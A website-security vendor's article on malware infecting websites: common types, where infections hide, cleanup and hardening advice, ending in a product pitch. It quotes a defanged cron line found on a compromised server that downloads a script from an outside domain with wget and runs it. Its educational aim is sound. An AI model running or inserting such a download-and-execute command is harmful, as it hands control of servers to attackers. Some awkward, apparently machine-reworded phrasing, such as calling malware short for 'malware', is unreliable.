Almost since the inception of the internet, malware infections have kept pace to become the biggest nuisance experienced by a site owner. With an ever increasing number of sites making up the World Wide Web, malware infections are becoming more and more common. In this article, we will discuss what malware is, the different types we have come across, the methods used to inject malware into a site, and how you can harden / protect your site against these methods.
What is malware?
So what exactly is malware? Well, malware is short for “malware” and is a file or code transmitted over a network. Malware is able to perform virtually any behavior an attacker wants, depending on the vulnerability exploited by the attack. Usually its intention is to abuse the site’s resources without damaging the site. If a site is broken / disabled, the attacker will not necessarily be able to achieve their goals. It is capable of inflicting damage such as redirecting users to spam sites, using website resources to host phishing, filling the website with unwanted and non-repeatable website links, the theft of customers’ credit card numbers or the degradation of a site. All of this can have an extremely negative effect on your website’s reputation and SEO. There are different types of malware such as the following:
- Credit card skimmer
- Drive by download
- Back door
How malware spreads
The old question that website owners usually ask is “how did this infection come about?” However, to answer this question, you must first identify the attack. Malware can be found in some of the obscure places, but here are the most common culprits we found:
- Content management system (CMS) core integrity files
- Site root directory
- Theme files
- Plugin / Extension Files
- Index file
Malware injection can occur primarily through software vulnerabilities, third-party integrations, and obtaining login credentials through various tactics. How the infection is able to exploit your website and the level of access it will have to your environment will depend on the type of vulnerability it exploits and what other mitigation / protection mechanisms are in place, so this will vary from infection to infection. It is important to note that re-infections can occur if no post-hack adjustments are made to the site. Malware can still potentially be injected without administrator rights (eg backdoors), and it can be installed without the victim’s knowledge in the event of a compromise. To reduce the chances of malware re-infecting your site, skip to our section on post-piracy prevention.
What malware looks like
As mentioned earlier, malware can appear in several ways. Our server side scanner is regularly updated to include new signatures discovered when new malware is written by attacks to exploit new vulnerabilities, sometimes 0-day (also known as zero day exploits). For example, here is a recent malware infection in a jQuery file we encountered:
Another type of malware that we found in the wp content folder for WordPress was a backdoor script that appeared as such:
As you can see, the code in these files will generally be encoded in multiple layers of obfuscation, and, is frequently associated with disturbance. .htaccess files that refuse PHP proper performance in the website environment:
Order Allow,Deny Allow from all
We can even detect malware in cron jobs on a hosting server. For example:
MAILTO="" * * * * * wget -q -O xxxd hxxp://hello.hahaha666[.]xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/websitefolder/public_html 811-5 && rm -f xxxd
These are just a few of the many types of malware that we recently encountered during cleanups, but it’s worth noting in case you’re looking to identify malware on your own server.
While identifying and removing unwanted malware is important, one of the most crucial steps in repairing a site is tracking. Many site owners assume that if they just restore from a previous backup before an infection occurs, everything will be fine again. However, this still does not resolve the underlying vulnerabilities that allowed the hack to occur in the first place. The same philosophy can be applied to an insect infestation or to personal health. You may have gotten rid of the bugs or the disease, but understanding the main reason why these things happened in the first place can help prevent them from happening again and may cost less in the future.
One of the most important recommendations I give to clients is to update their version of CMS (WordPress, Drupal, Joomla, Magento, etc.), as well as the theme and plugins.
Another recommendation is to make sure you keep plugins and user privileges to a minimum. Having too many plugins on a CMS can potentially make the site more vulnerable to infection, and having too many users with administrator privileges can be riskier.
Because database breaches have become more common, you still want to make sure that all accounts have a strong password. By using a password generator as well as a password manager is one of the most effective ways to make sure your site isn’t Brute Forced. For more information on the security of your site, we recommend that you read our guide.
Malware infections for the average business can be scary and frustrating to experience, which is why our goal as a business is to educate and inform site owners on what to expect and how to overcome infections. As attacks continue to grow and get smarter, we must continue to be proactive and adapt to them. Since the average online user may not fully understand what is going on in the back end, it is important for website owners to protect their customers’ sensitive information.
As the New Year begins, make it a personal goal to maintain control over not only your personal security as an individual online, but as an online business as well. In addition to the previous recommendations and tips for securing your site, we offer you a WordPress plugin who actively monitors your site, as well as our Website security plan including firewall protection. Get the peace of mind you need with your website security for the New Year.